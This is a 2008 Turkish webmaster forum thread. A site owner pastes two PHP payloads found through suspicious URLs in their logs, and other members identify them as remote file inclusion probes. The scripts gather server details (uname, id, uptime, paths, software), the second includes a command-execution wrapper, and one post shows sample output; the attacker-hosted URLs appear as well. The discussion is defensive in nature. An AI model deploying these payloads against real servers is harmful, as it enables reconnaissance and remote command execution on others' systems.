• 29-06-2008, 16:50:21
    #1
    Üyeliği durduruldu
    Mrb arkadaşlar,

    Az önce gördüğüm fakat ne oldugunu anlamadığım bi görüntüyle ile karşılaştım..

    Merak ettim sorayım dedim;



    Bu ne demek oluyo acaba
  • 29-06-2008, 17:03:48
    #2
    Bazen bu şekilde hatalar olabiliyor.

    Bunları tüm forumlarda görebilirsiniz, önemsemeye gerek yok yani.
  • 29-06-2008, 17:08:13
    #3
    Üyeliği durduruldu
    Hatamı değilmi bilmiyorum ama bulundugu yerde gösterlilen yerdeki linki kopyaladım baktm..

    http://theninjalegion.com/idd.txt???

    Sayfadaki kodlar;

    <?php
    function ConvertBytes($number)
    {
            $len = strlen($number);
            if($len < 4)
            {
                    return sprintf("%d b", $number);
            }
            if($len >= 4 && $len <=6)
            {
                    return sprintf("%0.2f Kb", $number/1024);
            }
            if($len >= 7 && $len <=9)
            {
                    return sprintf("%0.2f Mb", $number/1024/1024);
            }
       
            return sprintf("%0.2f Gb", $number/1024/1024/1024);
                               
    }
    
    echo "Mic22<br>";
    $un = @php_uname();
    $up = system(uptime);
    $id1 = system(id);
    $pwd1 = @getcwd();
    $sof1 = getenv("SERVER_SOFTWARE");
    $php1 = phpversion();
    $name1 = $_SERVER['SERVER_NAME'];
    $ip1 = gethostbyname($SERVER_ADDR);
    $free1= diskfreespace($pwd1);
    $free = ConvertBytes(diskfreespace($pwd1));
    if (!$free) {$free = 0;}
    $all1= disk_total_space($pwd1);
    $all = ConvertBytes(disk_total_space($pwd1));
    if (!$all) {$all = 0;}
    $used = ConvertBytes($all1-$free1);
    $os = @PHP_OS;
    
    
    echo "Mic22 was here ..<br>";
    echo "uname -a: $un<br>";
    echo "os: $os<br>";
    echo "uptime: $up<br>";
    echo "id: $id1<br>";
    echo "pwd: $pwd1<br>";
    echo "php: $php1<br>";
    echo "software: $sof1<br>";
    echo "server-name: $name1<br>";
    echo "server-ip: $ip1<br>";
    echo "free: $free<br>";
    echo "used: $used<br>";
    echo "total: $all<br>";
    exit;
    Hiç görmediğim şeyler gördüm.. Ne işe yaradıkları hakkında da bilgim yok.. Durduk yere olmaz heralde
  • 29-06-2008, 17:09:46
    #4
    Üyeliği durduruldu
    PHP'yi include etmeye çalışmış , hack girişimi .
    software , os , pwd , id ..vs alıyor .
  • 29-06-2008, 17:18:27
    #5
    Üyeliği durduruldu
    ZeberuS adlı üyeden alıntı: mesajı görüntüle
    PHP'yi include etmeye çalışmış , hack girişimi .
    software , os , pwd , id ..vs alıyor .
    Peki başarılı oldularmı girişimlerinde ? Anlıyabilirmiyiz ??

    Eğer onlar öyle bi girişimde bulunduysa şuan elimizde olan kodlarla bizde girişimde bulunabiliriz ? Yukardaki kodların nasıl çalıştırıldığını biliyomusun ? Yada bi fikrin varmı ?
  • 29-06-2008, 17:24:44
    #6
    Üyeliği durduruldu
    Yaptığı başarılı olsaydı alacağı bilgiler alttakini gibi olacaktı , tabi senin sunucunkileri alırdı . O kadar önemli birşey değil , hatta gereksiz birşey , listpatch varken ...

    Mic22 sanırım arkadaşımızın nicki , was here neyim yazmış


    Mic22
    17:20:21 up 6 days, 8:12, 0 users, load average: 0.07, 0.02, 0.00 uid=99(nobody) gid=99(nobody) groups=99(nobody) Mic22 was here ..
    uname -a: Linux XXXX 2.6.9-023stab046.2-enterprise #1 SMP Mon Dec 10 15:22:33 MSK 2007 i686
    os: Linux
    uptime: 17:20:21 up 6 days, 8:12, 0 users, load average: 0.07, 0.02, 0.00
    id: uid=99(nobody) gid=99(nobody) groups=99(nobody)
    pwd: /home/XXXX/public_html
    php: 5.2.5
    software: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
    server-name: **.***.***.***
    server-ip: 
    free: 23.48 Gb
    used: 26.52 Gb
    total: 50.00 Gb
  • 01-07-2008, 05:06:51
    #7
    Üyeliği durduruldu
    Yine bişeyler oluyor



    http://electrometro.com.ve/wall/xpl/alb??

    <?
    echo "ALBANIA<br>";
    $alb = @php_uname();
    $alb2 = system(uptime);
    $alb3 = system(id);
    $alb4 = @getcwd();
    $alb5 = getenv("SERVER_SOFTWARE");
    $alb6 = phpversion();
    $alb7 = $_SERVER['SERVER_NAME'];
    $alb8 = $_SERVER['SERVER_ADDR'];
    $os = @PHP_OS;
    echo "UNITED ALBANIANS aka ALBOSS PARADISE<br>";
    echo "os: $os<br>";
    echo "uname -a: $alb<br>";
    echo "uptime: $alb2<br>";
    echo "id: $alb3<br>";
    echo "pwd: $alb4<br>";
    echo "SoftWare: $alb5<br>";
    echo "PHPV: $alb6<br>";
    echo "ServerName: $alb7<br>";
    echo "ServerAddr: $alb8<br>";
    $free = disk_free_space($alb4);
    if ($free === FALSE) {$free = 0;}
    if ($free < 0) {$free = 0;}
    echo "Free: ".view_size($free)."<br>";
    $cmd="id";
    $eseguicmd=ex($cmd);
    echo $eseguicmd;
    function ex($cfe){
    $res = '';
    if (!empty($cfe)){
    if(function_exists('exec')){
    @exec($cfe,$res);
    $res = join("\n",$res);
    }
    elseif(function_exists('shell_exec')){
    $res = @shell_exec($cfe);
    }
    elseif(function_exists('system')){
    @ob_start();
    @system($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
    }
    elseif(function_exists('passthru')){
    @ob_start();
    @passthru($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
    }
    elseif(@is_resource($f = @popen($cfe,"r"))){
    $res = "";
    while(!@feof($f)) { $res .= @fread($f,1024); }
    @pclose($f);
    }}
    return $res;
    }
    function view_size($size)
    {
    if (!is_numeric($size)) {return FALSE;}
    else
    {
      if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
      elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
      elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
      else {$size = $size . " B";}
      return $size;
    }
    }
    exit;
    ?>
    Bu seferde başka bi site musallat oldu



    Yuh artık
  • 01-07-2008, 09:56:21
    #8
    sanırım onlar bi hack sitesinde iki üç lamer bir tane biri çıkıp vb de rfi açığı buldum diye herkeze yaymış bunlarda önüne gelen sitede deneme yapıyorlar. korkacak birşey yok. zaten zebarus yazmış.
  • 01-07-2008, 10:55:01
    #9
    Platin üye
    Bu şekilde birşey yapamazlar güncel sürüm kullanıyorsan.Canını sıkarlarsa ip ban at gitsin